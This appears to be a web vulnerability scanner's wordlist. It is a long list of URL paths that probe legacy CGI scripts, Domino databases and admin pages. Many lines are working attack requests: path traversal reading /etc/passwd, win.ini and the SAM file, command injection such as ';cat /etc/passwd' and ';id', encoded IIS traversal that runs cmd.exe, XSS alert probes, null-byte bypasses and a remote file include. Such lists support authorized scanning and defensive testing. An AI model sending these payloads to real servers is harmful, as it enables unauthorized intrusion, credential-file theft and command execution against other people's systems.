+cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/fortune
+cgi-bin/foxweb.dll
+cgi-bin/foxweb.exe
+cgi-bin/fpadmin.htm
+cgi-bin/fpcount.exe
+cgi-bin/fpexplore.exe
+cgi-bin/fpexplorer.exe
+cgi-bin/fpremadm.exe
+cgi-bin/fpsrvadm.exe
+cgi-bin/ftp.pl
+cgi-bin/gH.cgi
+cgi-bin/gbadmin.cgi?action=change_adminpass
+cgi-bin/gbook/gbook.cgi
+cgi-bin/gbook/gbook.cgi?_MAILTO=check;id
+cgi-bin/gbpass.pl
+cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+cgi-bin/get32.exe
+cgi-bin/get32.exe\dir
+cgi-bin/getdoc.cgi
+cgi-bin/gettransbitmap
+cgi-bin/glimpse
+cgi-bin/global.cgi
+cgi-bin/gm-authors.cgi
+cgi-bin/gm-cplog.cgi
+cgi-bin/gm.cgi
+cgi-bin/guestbook.cgi
+cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
+cgi-bin/guestbook.pl
+cgi-bin/guestbook/passwd
+cgi-bin/handler
+cgi-bin/handler.cgi
+cgi-bin/handler/netsonar;cat	/etc/passwd|?data=Download
+cgi-bin/hello.bat
+cgi-bin/hello.bat?&dir+c:\
+cgi-bin/hitview.cgi
+cgi-bin/horde/test.php
+cgi-bin/horde/test.php?mode=phpinfo
+cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
+cgi-bin/hsx.cgi
+cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
+cgi-bin/htgrep
+cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
+cgi-bin/htimage.exe
+cgi-bin/htimage.exe/path/filename?0,0
+cgi-bin/htimage.exe?0,0
+cgi-bin/html2chtml.cgi
+cgi-bin/html2wml.cgi
+cgi-bin/htmlscript
+cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
+cgi-bin/htsearch
+cgi-bin/htsearch?-c/nonexistant
+cgi-bin/htsearch?config=aaa
+cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+cgi-bin/htsearch?exclude=%60/etc/passwd%60
+cgi-bin/ibill.pm
+cgi-bin/icat
+cgi-bin/if/admin/nph-build.cgi
+cgi-bin/iisadmpwd/achg.htr
+cgi-bin/iisadmpwd/aexp.htr
+cgi-bin/iisadmpwd/aexp2.htr
+cgi-bin/iisadmpwd/anot.htr
+cgi-bin/ikonboard/help.cgi
+cgi-bin/ikonboard/help.cgi?
+cgi-bin/imageFolio.cgi
+cgi-bin/imagefolio/admin/admin.cgi
+cgi-bin/imagemap
+cgi-bin/imagemap.exe
+cgi-bin/inc/sendmail.inc
+cgi-bin/include/new-visitor.inc.php
+cgi-bin/index.js0x70
+cgi-bin/index.pl
+cgi-bin/info2www
+cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>
+cgi-bin/infosrch.cgi
+cgi-bin/input.bat
+cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/input2.bat
+cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
+cgi-bin/ion-p?page=../../../../../etc/passwd
+cgi-bin/ipf/etc/gfw/ui/pwd.dat
+cgi-bin/jj
+cgi-bin/journal.cgi?folder=journal.cgi%00
+cgi-bin/ksh
+cgi-bin/lasso.cgi
+cgi-bin/lastlines.cgi?process
+cgi-bin/listrec.pl
+cgi-bin/loadpage.cgi
+cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
+cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/log-reader.cgi
+cgi-bin/log/
+cgi-bin/log/nether-log.pl?checkit
+cgi-bin/login.cgi
+cgi-bin/login.pl
+cgi-bin/login.pl?course_id=\
+cgi-bin/logit.cgi
+cgi-bin/logs.pl
+cgi-bin/logs/
+cgi-bin/logs/access_log
+cgi-bin/logs/error_log
+cgi-bin/lookwho.cgi
+cgi-bin/lsindex2.bat
+cgi-bin/lwgate
+cgi-bin/lwgate.cgi
+cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
+cgi-bin/mail
+cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
+cgi-bin/mailfile.cgi
+cgi-bin/mailform.exe
+cgi-bin/mailform.pl
+cgi-bin/mailit.pl
+cgi-bin/maillist.cgi
+cgi-bin/maillist.pl
+cgi-bin/mailnews.cgi
+cgi-bin/mailto.cgi
+cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
+cgi-bin/main_menu.pl
+cgi-bin/majordomo.pl
+cgi-bin/man.sh
+cgi-bin/mdma.bat
+cgi-bin/meta.pl
+cgi-bin/mgrqcgi
+cgi-bin/mini_logger.cgi
+cgi-bin/minimal.exe
+cgi-bin/mkilog.exe
+cgi-bin/mkplog.exe
+cgi-bin/mmstdod.cgi
+cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
+cgi-bin/moin.cgi?test
+cgi-bin/mojo/mojo.cgi
+cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cgi?cfg=blah
+cgi-bin/ms_proxy_auth_query/
+cgi-bin/mt-static/
+cgi-bin/mt-static/mt-check.cgi
+cgi-bin/mt-static/mt-load.cgi
+cgi-bin/mt-static/mt.cfg
+cgi-bin/mt/
+cgi-bin/mt/mt-check.cgi
+cgi-bin/mt/mt-load.cgi
+cgi-bin/mt/mt.cfg
+cgi-bin/multihtml.pl?multi=/etc/passwd%00html
+cgi-bin/musicqueue.cgi
+cgi-bin/myguestbook.cgi?action=view
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
+cgi-bin/netauth.cgi
+cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
+cgi-bin/netpad.cgi
+cgi-bin/news/news.cgi
+cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
+cgi-bin/newsdesk.cgi?t=../pass.txt
+cgi-bin/nimages.php
+cgi-bin/nlog-smb.cgi
+cgi-bin/nlog-smb.pl
+cgi-bin/non-existent.pl
+cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/nph-error.pl
+cgi-bin/nph-exploitscanget.cgi
+cgi-bin/nph-maillist.pl
+cgi-bin/nph-publish
+cgi-bin/nph-publish.cgi
+cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+cgi-bin/nph-test-cgi
+cgi-bin/ntitar.pl
+cgi-bin/opendir.php?/etc/passwd
+cgi-bin/orders/orders.txt
+cgi-bin/pagelog.cgi
+cgi-bin/pals-cgi
+cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
+cgi-bin/parse-file
+cgi-bin/pass
+cgi-bin/passwd
+cgi-bin/passwd.txt
+cgi-bin/password
+cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
+cgi-bin/perl
+cgi-bin/perl.exe
+cgi-bin/perl.exe?-v
+cgi-bin/perl?-v
+cgi-bin/perlshop.cgi
+cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
+cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/pfdisplay
+cgi-bin/pfdisplay.cgi
+cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
+cgi-bin/phf
+cgi-bin/phf.cgi
+cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
+cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
+cgi-bin/photo/
+cgi-bin/photo/manage.cgi
+cgi-bin/photo/protected/manage.cgi
+cgi-bin/php
+cgi-bin/php-cgi
+cgi-bin/php.cgi
+cgi-bin/php.cgi?/etc/passwd
+cgi-bin/plusmail
+cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
+cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
+cgi-bin/pollssi.cgi
+cgi-bin/post-query
+cgi-bin/post16.exe
+cgi-bin/post32.exe
+cgi-bin/post32.exe|dir%20c:\
+cgi-bin/post_query
+cgi-bin/postcards.cgi
+cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
+cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/ppdscgi.exe
+cgi-bin/printenv
+cgi-bin/processit.pl
+cgi-bin/profile.cgi
+cgi-bin/pu3.pl
+cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
+cgi-bin/query
+cgi-bin/query?mss=%2e%2e/config
+cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
+cgi-bin/quikstore.cfg
+cgi-bin/quizme.cgi
+cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/ratlog.cgi
+cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
+cgi-bin/redirect
+cgi-bin/redirect.cgi
+cgi-bin/redirect.exe
+cgi-bin/register.cgi
+cgi-bin/replicator/webpage.cgi
+cgi-bin/replicator/webpage.cgi/
+cgi-bin/responder.cgi
+cgi-bin/retrieve_password.pl
+cgi-bin/rguest.exe
+cgi-bin/rightfax/fuwww.dll/?
+cgi-bin/rksh
+cgi-bin/rmp_query
+cgi-bin/robadmin.cgi
+cgi-bin/robpoll.cgi
+cgi-bin/rpm_query
+cgi-bin/rsh
+cgi-bin/rtm.log
+cgi-bin/rwcgi60
+cgi-bin/rwcgi60/showenv
+cgi-bin/rwwwshell.pl
+cgi-bin/s.cgi?q=a&tmpl=check
+cgi-bin/sam._
+cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
+cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
+cgi-bin/sbcgi/sitebuilder.cgi
+cgi-bin/scoadminreg.cgi
+cgi-bin/scripts/*%0a.pl
+cgi-bin/scripts/perl.exe
+cgi-bin/scripts/whois.cgi?action=load&whois=check
+cgi-bin/search
+cgi-bin/search.cgi
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/search.cgi?letter=
+cgi-bin/search.pl
+cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+cgi-bin/search/tidfinder.cgi?2956734
+cgi-bin/search97.vts
+cgi-bin/sendform.cgi
+cgi-bin/sendpage.pl
+cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
+cgi-bin/sensepost.exe?/c+dir
+cgi-bin/session/adminlogin
+cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
+cgi-bin/sh
+cgi-bin/shop.cgi
+cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
+cgi-bin/shop.pl/page=;cat%20shop.pl|
+cgi-bin/shop/auth_data/auth_user_file.txt
+cgi-bin/shop/orders/orders.txt
+cgi-bin/shopper.cgi
+cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
+cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
+cgi-bin/show.pl
+cgi-bin/shtml.dll
+cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
+cgi-bin/simplestguest.cgi
+cgi-bin/simplestmail.cgi
+cgi-bin/smartsearch.cgi
+cgi-bin/smartsearch/smartsearch.cgi
+cgi-bin/snorkerz.bat
+cgi-bin/snorkerz.cmd
+cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+cgi-bin/spin_client.cgi?aaaaaaaa
+cgi-bin/ss
+cgi-bin/sscd_suncourier.pl
+cgi-bin/ssi
+cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/stat.pl
+cgi-bin/stat/
+cgi-bin/stats-bin-p/reports/index.html
+cgi-bin/stats.pl
+cgi-bin/stats.prf
+cgi-bin/stats/
+cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/stats_old/
+cgi-bin/statsconfig
+cgi-bin/statsconfig.pl
+cgi-bin/statusconfig.pl
+cgi-bin/statview.pl
+cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
+cgi-bin/store.cgi?StartID=../etc/hosts%00.html
+cgi-bin/store/agora.cgi?page=whatever33.html
+cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
+cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/subscribe.pl
+cgi-bin/survey
+cgi-bin/survey.cgi
+cgi-bin/sws/admin.html
+cgi-bin/sws/manager.pl
+cgi-bin/tablebuild.pl
+cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
+cgi-bin/tcsh
+cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
+cgi-bin/test-cgi
+cgi-bin/test-cgi.bat
+cgi-bin/test-cgi.tcl
+cgi-bin/test-cgi?/*
+cgi-bin/test-env
+cgi-bin/test.bat
+cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/test.cgi
+cgi-bin/test/test.cgi
+cgi-bin/testcgi.exe
+cgi-bin/testing_whatever
+cgi-bin/texis.exe/junk
+cgi-bin/texis/junk
+cgi-bin/texis/phine
+cgi-bin/textcounter.pl
+cgi-bin/tidfinder.cgi
+cgi-bin/tigvote.cgi
+cgi-bin/title.cgi
+cgi-bin/tpgnrock
+cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/troops.cgi
+cgi-bin/tst.bat
+cgi-bin/tst.bat\dir
+cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
+cgi-bin/ultraboard.cgi
+cgi-bin/ultraboard.pl
+cgi-bin/unlg1.1
+cgi-bin/unlg1.2
+cgi-bin/update.dpgs
+cgi-bin/upload.cgi
+cgi-bin/upload_file.pl
+cgi-bin/uptime
+cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
+cgi-bin/ustorekeeper.pl
+cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+cgi-bin/utm/admin
+cgi-bin/utm/utm_stat
+cgi-bin/view-source
+cgi-bin/view-source?view-source
+cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-bin/view_page.html
+cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
+cgi-bin/viewlogs.pl
+cgi-bin/viewsource?/etc/passwd
+cgi-bin/viralator.cgi
+cgi-bin/virgil.cgi
+cgi-bin/visadmin.exe
+cgi-bin/visadmin.exe?user=guest
+cgi-bin/visitor.exe
+cgi-bin/vote.cgi
+cgi-bin/vpasswd.cgi
+cgi-bin/w3-msql
+cgi-bin/w3-msql/
+cgi-bin/w3-sql
+cgi-bin/wais.pl
+cgi-bin/way-board.cgi?db=/etc/passwd%00
+cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
+cgi-bin/wconsole.dll
+cgi-bin/webais
+cgi-bin/webbbs.cgi
+cgi-bin/webbbs.exe
+cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
+cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
+cgi-bin/webdata.cgi
+cgi-bin/webdist.cgi
+cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
+cgi-bin/webdriver
+cgi-bin/webfind.exe?keywords=01234567890123456789
+cgi-bin/webgais
+cgi-bin/webif.cgi
+cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/webmap.cgi
+cgi-bin/webnews.pl
+cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
+cgi-bin/webplus.exe
+cgi-bin/webplus.exe?about
+cgi-bin/webplus?about
+cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
+cgi-bin/websendmail
+cgi-bin/webspirs.cgi
+cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
+cgi-bin/webutil.pl
+cgi-bin/webutils.pl
+cgi-bin/webwho.pl
+cgi-bin/wguest.exe
+cgi-bin/whois.cgi?action=load&whois=%3Bid
+cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
+cgi-bin/whois_raw.cgi
+cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
+cgi-bin/windmail
+cgi-bin/windmail.exe
+cgi-bin/wrap
+cgi-bin/wrap.cgi
+cgi-bin/ws_ftp.ini
+cgi-bin/www-sql
+cgi-bin/wwwadmin.pl
+cgi-bin/wwwboard.cgi.cgi
+cgi-bin/wwwboard.pl
+cgi-bin/wwwstats.pl
+cgi-bin/wwwthreads/3tvars.pm
+cgi-bin/wwwthreads/w3tvars.pm
+cgi-bin/wwwwais
+cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
+cgi-bin/zsh
+cgi-dos/args.bat
+cgi-dos/args.cmd
+cgi-home
+cgi-local
+cgi-local/cgiemail-1.4/cgicso?query=AAA
+cgi-local/cgiemail-1.6/cgicso?query=AAA
+cgi-perl
+cgi-shl/win-c-sample.exe
+cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-sys/FormMail-clone.cgi
+cgi-sys/addalink.cgi
+cgi-sys/cgiecho
+cgi-sys/cgiemail
+cgi-sys/countedit
+cgi-sys/domainredirect.cgi
+cgi-sys/entropybanner.cgi
+cgi-sys/entropysearch.cgi
+cgi-sys/helpdesk.cgi
+cgi-sys/mchat.cgi
+cgi-sys/randhtml.cgi
+cgi-sys/realhelpdesk.cgi
+cgi-sys/realsignup.cgi
+cgi-sys/scgiwrap
+cgi-sys/signup.cgi
+cgi-win
+cgi-win/cgitest.exe
+cgi-win/perl.exe
+cgi-win/uploader.exe
+cgi-win/wguest.exe
+cgi-win/wincgi.bat 
+cgi/
+cgi/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+cgi/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+cgi/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+cgi/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+cgi/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+cgi/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+cgi/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+cgi/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+cgi/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+cgi/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+cgi/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+cgi/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+cgi/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+cgi/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+cgi/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+cgi/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
+cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
+cgi/cgiproc?
+cgi/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir
+cgi/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir
+cgibin
+cgis/wwwboard/wwwboard.cgi
+cgis/wwwboard/wwwboard.pl
+chassis/config/GeneralChassisConfig.html
+chat/!nicks.txt
+chat/!pwds.txt
+chat/data/usr
+chat_dir/register.php
+chatlog.nsf
+checkout_payment.php
+class/mysql.class
+clbusy.nsf
+cldbdir.nsf
+cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\
+clocktower/
+clusta4.nsf
+clusterframe.jsp
+cmd.exe?/c+dir%20c:\
+collect4.nsf
+com
+com/novell/gwmonitor/help/en/default.htm
+com/novell/webaccess/help/en/default.htm
+com/novell/webpublisher/help/en/default.htm
+com1
+com2
+com3
+com4
+common/browser.inc
+communique.asp
+community/forumdisplay.php
+community/index.php?analized=anything
+community/member.php
+compte.php
+con/con
+config.inc
+config.php
+config/
+config/checks.txt
+config/html/cnf_gi.htm
+config/import.txt
+config/mountain.cfg
+config/orders.txt
+consport.chl+
+content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
+content/base/build/explorer/none.php?/etc/passwd
+contents.php?new_language=elvish&mode=select
+contents/extensions/asp/1
+convert-date.php
+count.cgi
+counter
+counter/1/n/n/0/3/5/0/a/123.gif
+cp/rac/nsManager.cgi
+cpa.nsf
+cpanel/
+cplogfile.log
+cpqlogin.htm
+csPassword.cgi?command=remove%20
+current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
+current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
+custdata/
+customerdata.nsf
+cutenews/comments.php
+cutenews/index.php?debug
+cutenews/search.php
+cutenews/shownews.php
+da.nsf
+data.sql
+data/member_log.txt
+data/userlog/log.txt
+database.nsf
+database/
+database/db2000.mdb
+database/metacart.mdb
+database/metacart.mdb+
+databases/
+databse.sql
+db.nsf
+db.php
+db.sql
+db/
+db/users.dat
+dba4.nsf
+dbabble
+dbase/
+dc/auth_data/auth_user_file.txt
+dc/orders/orders.txt
+dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+dclf.nsf
+dcp/advertiser.php
+dcshop/auth_data/auth_user_file.txt
+dcshop/orders/orders.txt
+decsadm.nsf
+decsdoc.nsf
+decslog.nsf
+default.asp
+default.asp%2e
+default.asp%2e%41sp
+default.asp%81
+default.asp+.htr
+default.asp.
+default.asp::$DATA
+default.asp\\
+default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../../../../../../win.ini&CiRestriction=none&CiHiliteType=Full
+default.nsf
+default.php
+defines.php
+demo/ojspext/events/globals.jsa
+demo/sql/index.jsp
+deny/
+dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
+dirassist.nsf
+directory.php?dir=%3Bcat%20/etc/passwd
+dit.pl
+dltclnt.php
+dmin
+dmin.html
+dministration
+dms0
+do_map
+do_subscribe
+doc/admin/index.php
+doc/domguide.nsf
+doc/dspug.nsf
+doc/help4.nsf
+doc/helpadmin.nsf
+doc/helplt4.nsf
+doc/internet.nsf
+doc/javapg.nsf
+doc/lccon.nsf
+doc/migrate.nsf
+doc/npn_admn.nsf
+doc/npn_rn.nsf
+doc/packages/
+doc/readmec.nsf
+doc/readmes.nsf
+doc/rt/overview-summary.html
+doc/smhelp.nsf
+doc/srvinst.nsf
+doc/webmin.config.notes
+docs/
+docs/NED
+docs/NED?action=retrieve&location=.
+docs/sdb/en/html/index.html
+docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
+document/
+documents/
+doladmin.nsf
+dols_help.nsf
+domadmin.nsf
+domcfg.nsf
+domguide.nsf
+domlog.nsf
+dostuff.php?action=modify_user
+dotproject/modules/files/index_table.php
+dotproject/modules/projects/addedit.php
+dotproject/modules/projects/view.php
+dotproject/modules/projects/vw_files.php
+dotproject/modules/tasks/addedit.php
+dotproject/modules/tasks/viewgantt.php
+down/
+download.php?op=viewdownload
+download/
+downloads/
+downloads/pafiledb.php?action=download&id=4?\
+downloads/pafiledb.php?action=email&id=4?\
+downloads/pafiledb.php?action=rate&id=4?\
+dspug.nsf
+edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
+email.php
+emailfriend/emailarticle.php?id=\
+emailfriend/emailfaq.php?id=\
+emailfriend/emailnews.php?id=\
+embers
+emml_email_func.php
+emp
+emumail.cgi?type=.%00
+enter_bug.cgi
+entete.php
+enteteacceuil.php
+eports
+erl
+erl.exe
+erlshop.cgi
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
+error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
+error/HTTP_NOT_FOUND.html.var
+errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+est
+est-cgi
+esting
+estricted
+eta
+etc/passwd
+etc/shadow+
+ev
+evel
+evelopment
+event.nsf
+eventcal2.php.php
+events.nsf
+events4.nsf
+events5.nsf
+ew
+ews/ews/architext_query.pl
+ex/jsp/simple.jsp.
+exair/howitworks/Code.asp
+examples/applications/bboard/bboard_frames.html
+examples/basic/servlet/HelloServlet
+examples/context
+examples/cookie
+examples/forward1
+examples/forward2
+examples/header
+examples/include1
+examples/info
+examples/jsp/index.html
+examples/jsp/num/numguess.js%70
+examples/jsp/snp/anything.snp
+examples/jsp/snp/snoop.jsp
+examples/jsp/source.jsp??
+examples/servlet/AUX
+examples/servlet/TroubleShooter
+examples/servlets/index.html
+examples/session
+exchange/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
+exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
+exchange/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
+exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
+exchange/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir
+exchange/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir
+exchange/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir
+exchange/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir
